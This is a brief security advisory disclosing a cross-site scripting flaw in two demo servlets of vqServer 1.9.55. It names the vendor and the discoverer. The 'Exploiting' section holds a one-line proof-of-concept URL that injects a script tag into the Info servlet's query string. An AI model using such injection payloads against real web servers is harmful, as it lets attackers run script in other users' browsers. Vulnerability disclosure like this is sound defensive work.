CSS Vulnerability in vqSoft vqServer demo servlets
==================================================

vqServer is a free webserver running on Windows OS. 
has a cross-site-scripting vulnerability in the following demo servlets:

- SessionDemo Servlet (1.9)
- Info Servlet (1.9)

Vulnerable versions:
====================

- vqServer 1.9.55


Exploiting:
===========

  http://127.0.0.1/servlet/vq.demos.Info?<script>alert("ups...")</script>

Vendor:
=======

Name: Steve Shering(s.shering@vqsoft.com)
Homepage: http://www.vqsoft.com

Misc:
=====

vqServer seems not to be updated for some years.

Discovered by/Credit:
=====================

Oliver Karow (oliver.karow[at]gmx.de)